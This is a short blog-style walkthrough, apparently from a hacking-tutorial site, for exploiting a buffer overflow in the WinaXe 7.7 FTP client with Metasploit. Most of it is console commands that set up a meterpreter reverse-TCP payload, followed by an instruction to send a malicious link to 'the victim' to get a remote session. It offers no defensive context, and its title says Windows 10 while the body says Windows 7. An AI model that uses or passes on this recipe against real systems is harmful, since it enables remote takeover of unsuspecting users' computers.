This module exploits a buffer overflow in the WinaXe 7.7 FTP client. This issue is triggered when a client connects to the server and is expecting the Server Ready response.
Exploit Targets
WinaXe 7.7 FTP client
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use exploit/windows/ftp/winaxe_server_ready
msf exploit (winaxe_server_ready)>set lhost 192.168.0.106
msf exploit (winaxe_server_ready)>set srvhost 192.168.0.106
msf exploit (winaxe_server_ready)>set payload windows/meterpreter/reverse_tcp
msf exploit (winaxe_server_ready)>exploit
Now send the link to the victim when victim, enter in connection details and wait for the FTP connection WinaXe ftp. You will get victim meterpreter session.
The post Exploit Windows 10 pc using WinaXe 7.7 FTP Client Remote Buffer Overflow appeared first on Hacking Articles.